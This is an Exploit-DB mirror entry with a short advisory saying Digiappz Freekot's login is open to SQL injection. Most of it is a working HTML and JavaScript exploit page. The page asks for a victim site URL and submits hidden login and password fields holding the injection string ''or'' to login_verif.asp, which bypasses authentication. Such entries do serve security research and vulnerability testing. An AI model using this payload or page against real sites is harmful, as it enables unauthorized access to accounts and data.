exploit-db-mirror/exploits/asp/webapps/28443.html

source: https://www.securityfocus.com/bid/19768/info

Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit could allow an attacker to compromise the application, retrieve sensitive information, or modify data; other consequences are possible as well.

<html> <head><title>KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass exploit </title></head> <body bgcolor="black"> <script language="JavaScript"> function egxpl() { if (document.xplt.victim.value=="") { alert("Please enter victim site!"); return false; } if (confirm("Are you sure?")) { xplt.action=document.xplt.victim.value+"/login_verif.asp"; xplt.login.value=document.xplt.login.value; xplt.password.value=document.xplt.password.value; xplt.submit(); } } </script><font face=Verdana size=2 color="#00FF00"><center><b>KAPDA :: Freekot SQL-Injection Vulnerability<br> Discovered and coded by FarhadKey From KAPDA.IR<br> Special Thx to Hessam-x From Anti-Security.net (Hackerz.ir)<br></b> <form name="xplt" method="post" onsubmit="egxpl();"> <br>Victim Path : (insert http:// for path)<br> <input type="text" name="victim" value="http://www.victim.com/FreeKot_Path/" size="44" class="xpl" style="color: #00FF00; background-color: #000000"><br> <input type="hidden" name="login" value="'or'"> <input type="hidden" name="password" value="'or'"><br> <!-- Discovered and coded by FarhadKey . Kapda.ir --> <input type="submit" value="GO !!!" style="color: #00FF00; background-color: #000000"> </form></body></html>